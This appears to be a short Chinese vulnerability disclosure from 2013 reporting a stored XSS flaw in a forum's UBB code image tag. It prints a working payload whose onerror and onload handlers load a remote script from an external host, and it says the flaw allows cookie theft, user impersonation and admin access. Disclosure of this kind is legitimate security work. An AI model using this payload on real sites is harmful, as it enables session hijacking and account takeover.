### 简要描述:
可以在小洞上自由发辉成大洞
XSS小洞一个
### 详细说明:
讨论区发布话题对UBBcode未过滤完全
```
[img]e2.jpg"onerror="jQuery.getScript('http://1.tengzhou8.sinaapp.com/tp.js')" onload="jQuery.getScript('http://1.tengzhou8.sinaapp.com/tp.js')[/img]
```
危害:现在我只是小小的利用了一下赞和收藏功能,可模仿用户进行任意操作,盗COOKIE,登后台,危害较大
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201309/262326104789e7455c90f7a08deb55aa657d2ac6.jpg" alt="3.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/262326104789e7455c90f7a08deb55aa657d2ac6.jpg)
[<img src="https://images.seebug.org/upload/201309/26232543aabded67fb12f6959db552dd3d3dc586.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/26232543aabded67fb12f6959db552dd3d3dc586.jpg)
京公网安备 11010502034610号
暂无评论